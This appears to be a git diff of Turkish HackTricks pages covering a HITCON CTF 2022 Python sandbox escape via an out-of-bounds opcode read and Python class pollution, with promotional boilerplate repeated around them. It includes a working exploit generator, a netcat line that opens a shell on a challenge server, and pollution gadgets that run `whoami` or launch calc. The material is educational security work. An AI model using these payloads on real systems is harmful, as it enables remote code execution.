* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
```python
import hashlib
@ -61,16 +62,17 @@ return 0
main()
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,43 +1,40 @@
# LOAD\_NAME / LOAD\_CONST opcode OOB Okuma
# LOAD_NAME / LOAD_CONST opcode OOB Okuma
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Bu bilgi** [**bu yazıdan alınmıştır**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
LOAD\_NAME / LOAD\_CONST opcode'da OOB okuma özelliğini kullanarak bellekteki bazı sembolleri elde edebiliriz. Bu, istediğiniz sembolü (örneğin fonksiyon adı gibi) elde etmek için `(a, b, c, ... yüzlerce sembol ..., __getattribute__) if [] else [].__getattribute__(...)` gibi bir hile kullanmaktır.
LOAD_NAME / LOAD_CONST opcode'daki OOB okuma özelliğini kullanarak bellekteki bazı sembolleri alabiliriz. Bu, istediğiniz sembolü (örneğin işlev adı) almak için `(a, b, c, ... yüzlerce sembol ..., __getattribute__) if [] else [].__getattribute__(...)` gibi bir hile kullanmaktır.
Sonra sadece saldırınızı oluşturun.
### Genel Bakış <a href="#overview-1" id="overview-1"></a>
Kaynak kodu oldukça kısa, sadece 4 satırdan oluşuyor!
Kaynak kodu oldukça kısadır, sadece 4 satır içerir!
```python
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234
```
Arbitrary Python kodu girebilirsiniz ve bu, bir [Python kod nesnesine](https://docs.python.org/3/c-api/code.html) derlenecektir. Ancak, bu kod nesnesinin `co_consts` ve `co_names` özellikleri, kod nesnesini değerlendirmeden önce boş bir demetle değiştirilecektir.
### Sınır Dışı Okuma <a href="#out-of-bound-read" id="out-of-bound-read"></a>
Bu şekilde, sabitler (örneğin sayılar, dizeler vb.) veya isimler (örneğin değişkenler, fonksiyonlar) içeren tüm ifadeler sonunda hafıza ihlali nedeniyle çökmeye neden olabilir.
### Sınırlar Dışında Okuma <a href="#out-of-bound-read" id="out-of-bound-read"></a>
Hafıza ihlali nasıl oluşur?
Segmentation fault nasıl meydana gelir?
Basit bir örnek ile başlayalım, `[a, b, c]` aşağıdaki bytecode'a derlenebilir.
```
@ -47,11 +44,11 @@ Basit bir örnek ile başlayalım, `[a, b, c]` aşağıdaki bytecode'a derlenebi
6 BUILD_LIST 3
8 RETURN_VALUE12345
```
Ancak `co_names` boş bir tuple haline gelirse ne olur? `LOAD_NAME 2` opcode hala çalıştırılır ve değeri orijinal olarak olması gereken bellek adresinden okumaya çalışır. Evet, bu bir out-of-bound read "özelliği".
Ancak `co_names` boş bir demet haline gelirse ne olacak? `LOAD_NAME 2` opcode hala çalıştırılır ve aslında olması gereken bellek adresinden değeri okumaya çalışır. Evet, bu bir sınır dışı okuma "özelliği".
Çözüm için temel kavram basittir. CPython gibi bazı opcodes'lar, örneğin `LOAD_NAME` ve `LOAD_CONST`, OOB okumaya karşı savunmasızdır (?).
Çözüm için temel kavram oldukça basittir. CPython'daki bazı opcode'lar örneğin `LOAD_NAME` ve `LOAD_CONST`, sınır dışı okumaya açıktır (?).
Bu opcodes'lar, `consts` veya `names` tuple'ından (bunlar `co_consts` ve `co_names` olarak adlandırılır) `oparg` indisindeki bir nesneyi alır. CPython'ın `LOAD_CONST` opcode'yu işlerken ne yaptığını görmek için aşağıdaki kısa örneğe bakabiliriz.
Onlar, `co_consts` ve `co_names` altında adlandırılan `consts` veya `names` demetinden `oparg` dizininden bir nesne alırlar. CPython'ın `LOAD_CONST` opcode'unu işlediğinde ne yaptığını görmek için aşağıdaki kısa parçaya başvurabiliriz.
```c
case TARGET(LOAD_CONST): {
PREDICTED(LOAD_CONST);
@ -61,21 +58,21 @@ PUSH(value);
FAST_DISPATCH();
}1234567
```
Bu şekilde, OOB özelliğini kullanarak keyfi bellek ofsetinden bir "isim" alabiliriz. Hangi isme sahip olduğunu ve ofsetinin ne olduğunu belirlemek için sadece `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... denemeye devam edin. Ve oparg > 700 civarında bir şey bulabilirsiniz. Tabii ki bellek düzenine bakmak için gdb'yi de kullanabilirsiniz, ama daha kolay olacağını düşünmüyorum?
Bu şekilde, OOB özelliğini kullanarak keyfi bellek ofsetinden bir "isim" alabiliriz. Hangi isme sahip olduğunu ve ofsetinin ne olduğunu belirlemek için sadece `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... denemeye devam edin. Ve yaklaşık olarak oparg > 700 olduğunda bir şeyler bulabilirsiniz. Tabii ki bellek düzenine bakmak için gdb kullanmayı da deneyebilirsiniz, ama daha kolay olacağını sanmıyorum?
### Exploit Oluşturma <a href="#generating-the-exploit" id="generating-the-exploit"></a>
### Saldırıyı Oluşturma <a href="#generating-the-exploit" id="generating-the-exploit"></a>
İsimler / sabitler için bu kullanışlı ofsetleri elde ettikten sonra, bu ofsetten bir isim / sabit nasıl alır ve kullanırız? İşte size bir hile:\
5 ofsetinden (`LOAD_NAME 5`) `co_names=()` ile `__getattribute__` adını alabiliyorsak, sadece aşağıdaki adımları izleyin:
İsimler / sabitler için bu yararlı ofsetleri aldıktan sonra, bu ofsetten bir isim / sabit nasıl alınır ve kullanılır? İşte size bir ipucu:\
Bir `__getattribute__` ismini ofset 5 (`LOAD_NAME 5`) ile `co_names=()` alabileceğimizi varsayalım, o zaman sadece aşağıdaki adımları uygulayın:
```python
[a,b,c,d,e,__getattribute__] if [] else [
[].__getattribute__
# you can get the __getattribute__ method of list object now!
]1234
```
> Dikkat edin, onu `__getattribute__` olarak adlandırmak zorunda değilsiniz, daha kısa veya daha garip bir şey olarak adlandırabilirsiniz.
> `__getattribute__` olarak adlandırmanız gerekli değildir, daha kısa veya daha garip bir isim verebilirsiniz
Sadece bytecode'una bakarak nedenini anlayabilirsiniz:
Sadece bayt kodunu görüntüleyerek nedenini anlayabilirsiniz:
```python
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
@ -92,7 +89,7 @@ Sadece bytecode'una bakarak nedenini anlayabilirsiniz:
24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314
```
`LOAD_ATTR` komutunun da `co_names` üzerinden ismi alındığını fark edin. Python, isim aynı ise aynı ofsetten isimleri yükler, bu yüzden ikinci `__getattribute__` hala offset=5'ten yüklenir. Bu özelliği kullanarak isim bellekte yakınsa herhangi bir isim kullanabiliriz.
`LOAD_ATTR`'ın adı da `co_names`'den alındığını unutmayın. Python, isim aynıysa aynı ofsetten isimleri yükler, bu nedenle ikinci `__getattribute__` hala offset=5'ten yüklenir. Bu özelliği kullanarak isim belleğe yakın olduğunda keyfi isim kullanabiliriz.
Sayıları oluşturmak basit olmalı:
@ -101,11 +98,11 @@ Sayıları oluşturmak basit olmalı:
* 2: (not \[]) + (not \[])
* ...
### Saldırı Betiği <a href="#exploit-script-1" id="exploit-script-1"></a>
### Sızma Betiği <a href="#exploit-script-1" id="exploit-script-1"></a>
Uzunluk sınırlaması nedeniyle sabitler kullanmadım.
Uzunluk sınırı nedeniyle sabitleri kullanmadım.
İlk olarak, isimlerin bu ofsetlerini bulmak için bir betik aşağıda verilmiştir.
İlk olarak, isimlerin ofsetlerini bulmamız için bir betik aşağıda verilmiştir.
```python
from types import CodeType
from opcode import opmap
@ -140,7 +137,7 @@ print(f'{n}: {ret}')
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
```
Ve aşağıdaki gerçek Python saldırısını oluşturmak için kullanılır.
Ve aşağıdakiler gerçek Python saldırısını oluşturmak içindir.
```python
import sys
import unicodedata
@ -217,7 +214,7 @@ print(source)
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
```
Temel olarak, `__dir__` yönteminden aldığımız dizeler için aşağıdaki işlemleri yapar:
Bu temelde, `__dir__` yönteminden aldığımız dizeler için aşağıdaki işlemleri yapar:
```python
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
@ -230,16 +227,17 @@ getattr(
'__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,23 +1,23 @@
# Class Pollution (Python's Prototype Pollution)
# Sınıf Kirliliği (Python'ın Prototip Kirliliği)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Temel Örnek
Nesnelerin sınıflarını dizelerle nasıl kirletebileceğinizi kontrol edin:
Nesnelerin sınıflarını dizelerle nasıl kirletilebileceğini kontrol edin:
```python
class Company: pass
class Developer(Company): pass
@ -41,62 +41,7 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
```
## Temel Zayıflık Örneği
Consider the following Python code:
Aşağıdaki Python kodunu düşünün:
```python
class User:
def __init__(self, username, password):
self.username = username
self.password = password
def login(self):
# Code for logging in the user
def logout(self):
# Code for logging out the user
class Admin(User):
def __init__(self, username, password):
super().__init__(username, password)
self.is_admin = False
def promote_to_admin(self):
self.is_admin = True
def demote_from_admin(self):
self.is_admin = False
```
In this code, we have a `User` class and an `Admin` class that inherits from the `User` class. The `User` class has an `__init__` method to initialize the `username` and `password` attributes, as well as `login` and `logout` methods. The `Admin` class adds additional functionality with the `promote_to_admin` and `demote_from_admin` methods.
Bu kodda, `User` sınıfı ve `User` sınıfından türeyen `Admin` sınıfı bulunmaktadır. `User` sınıfı, `username` ve `password` özelliklerini başlatmak için `__init__` yöntemine sahiptir ve ayrıca `login` ve `logout` yöntemlerine sahiptir. `Admin` sınıfı, `promote_to_admin` ve `demote_from_admin` yöntemleriyle ek işlevsellik ekler.
Now, let's say an attacker is able to manipulate the `User` class prototype and add a new method called `delete_account`:
Şimdi, bir saldırganın `User` sınıfının prototipini manipüle edebildiğini ve `delete_account` adında yeni bir yöntem ekleyebildiğini varsayalım:
```python
User.__dict__["delete_account"] = lambda self: print("Account deleted!")
```
The attacker can then create an instance of the `Admin` class and call the `delete_account` method, even though it was not defined in the `Admin` class:
Saldırgan, `Admin` sınıfının bir örneğini oluşturabilir ve `delete_account` yöntemini çağırabilir, bu yöntem `Admin` sınıfında tanımlanmamış olsa bile:
```python
admin = Admin("admin", "password")
admin.delete_account() # Output: "Account deleted!"
```
This is an example of class pollution, where an attacker is able to modify the prototype of a class and add or modify its methods. In this case, the attacker was able to add a method to the `User` class and access it through an instance of the `Admin` class.
Bu, bir saldırganın bir sınıfın prototipini değiştirip yöntemlerini ekleyebileceği veya değiştirebileceği bir sınıf kirliliği örneğidir. Bu durumda, saldırgan `User` sınıfına bir yöntem ekleyebildi ve `Admin` sınıfının bir örneği üzerinden erişebildi.
```python
# Initial state
class Employee: pass
@ -129,41 +74,62 @@ USER_INPUT = {
merge(USER_INPUT, emp)
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
```
## Örnek Gadget'lar
## Gadget Örnekleri
<details>
<summary>Sınıf özelliği varsayılan değerini RCE'ye (alt işlem) dönüştürme</summary>
<summary>Class özelliği varsayılan değer oluşturarak RCE (alt işlem) </summary>
```python
from os import popen
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
class Recruiter(HR): pass # Class inherits from HR class
\`\`\`python from os import popen class Employee: pass # Creating an empty class class HR(Employee): pass # Class inherits from Employee class class Recruiter(HR): pass # Class inherits from HR class
class SystemAdmin(Employee): # Class inherits from Employee class def execute\_command(self): command = self.custom\_command if hasattr(self, 'custom\_command') else 'echo Hello there' return f'\[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
class SystemAdmin(Employee): # Class inherits from Employee class
def execute_command(self):
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
## Recursive merge function
USER_INPUT = {
"__class__":{
"__base__":{
"__base__":{
"custom_command": "whoami"
}
}
}
}
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
recruiter_emp = Recruiter()
system_admin_emp = SystemAdmin()
USER\_INPUT = { "**class**":{ "**base**":{ "**base**":{ "custom\_command": "whoami" } } } }
print(system_admin_emp.execute_command())
#> [!] Executing: "echo Hello there", output: "Hello there"
recruiter\_emp = Recruiter() system\_admin\_emp = SystemAdmin()
# Create default value for Employee.custom_command
merge(USER_INPUT, recruiter_emp)
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "echo Hello there", output: "Hello there"
## Create default value for Employee.custom\_command
merge(USER\_INPUT, recruiter\_emp)
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "whoami", output: "abdulrah33m"
````
print(system_admin_emp.execute_command())
#> [!] Executing: "whoami", output: "abdulrah33m"
```
</details>
<details>
<summary><code>globals</code> aracılığıyla diğer sınıfları ve global değişkenleri kirletme</summary>
<summary>Diğer sınıfları ve global değişkenleri <code>globals</code> aracılığıyla kirletme</summary>
```python
def merge(src, dst):
# Recursive merge function
@ -190,40 +156,46 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
print(not_accessible_variable) #> Polluted variable
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
````
```
</details>
<details>
<summary>Rastgele alt işlem yürütme</summary>
```python
import subprocess, json
\`\`\`python import subprocess, json
class Employee: def **init**(self): pass
class Employee:
def __init__(self):
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
## Recursive merge function
# Overwrite env var "COMSPEC" to execute a calc
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
## Overwrite env var "COMSPEC" to execute a calc
USER\_INPUT = json.loads('{"**init**":{"**globals**":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"\}}\}}\}}') # attacker-controlled value
merge(USER\_INPUT, Employee())
merge(USER_INPUT, Employee())
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
````
```
</details>
<details>
<summary><strong><code>__kwdefaults__</code></strong> üzerine yazma</summary>
<summary><strong><code>__kwdefaults__</code></strong> Üzerine Yazma</summary>
**`__kwdefaults__`**, tüm fonksiyonların özel bir özelliğidir. Python [belgelerine](https://docs.python.org/3/library/inspect.html) göre, bu özellik "yalnızca anahtar kelime parametreleri için herhangi bir varsayılan değerlerin bir eşlemesi"dir. Bu özelliği kirletmek, bir fonksiyonun yıldızlı (\*) veya \*args'ten sonra gelen anahtar kelime parametrelerinin varsayılan değerlerini kontrol etmemizi sağlar.
**`__kwdefaults__`**, tüm fonksiyonların özel bir özelliğidir, Python [belgelerine](https://docs.python.org/3/library/inspect.html) göre, bu özellik "**sadece anahtar kelime** parametreleri için herhangi bir varsayılan değerlerin eşlemesi"dir. Bu özelliği kirletmek, bir fonksiyonun sadece anahtar kelime parametrelerinin varsayılan değerlerini kontrol etmemizi sağlar, bunlar \* veya \*args'den sonra gelen fonksiyonun parametreleridir.
```python
from os import system
import json
@ -259,25 +231,22 @@ merge(emp_info, Employee())
print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
execute() #> Executing echo Polluted
#> Polluted
````
```
</details>
<details>
<summary>Flask gizli anahtarının farklı dosyalarda üzerine yazılması</summary>
Yani, webin ana python dosyasında tanımlanan ancak sınıfı ana dosyadan farklı bir dosyada tanımlanan bir nesne üzerinde sınıf kirliliği yapabilirseniz. Önceki payloadlarda \_\_globals\_\_'a erişmek için nesnenin sınıfına veya sınıfın yöntemlerine erişmeniz gerektiğinden, **o dosyadaki globals'e erişebileceksiniz, ancak ana dosyadaki globals'e erişemeyeceksiniz**.\
Bu nedenle, ana sayfada **gizli anahtar**'ı tanımlayan Flask uygulama global nesnesine **erişemezsiniz**:
<summary>Flask secret'ın farklı dosyalar arasında üzerine yazılması</summary>
Yani, web'in ana python dosyasında tanımlanan ancak **sınıfı ana dosyadan farklı bir dosyada tanımlanan bir nesne üzerinde sınıf kirliliği yapabilirsiniz**. Önceki yüklerde \_\_globals\_\_'a erişmek için nesnenin sınıfına veya sınıfın yöntemlerine erişmeniz gerektiğinden, **o dosyadaki globals'e erişebileceksiniz, ancak ana dosyadaki globals'e erişemeyeceksiniz**. \
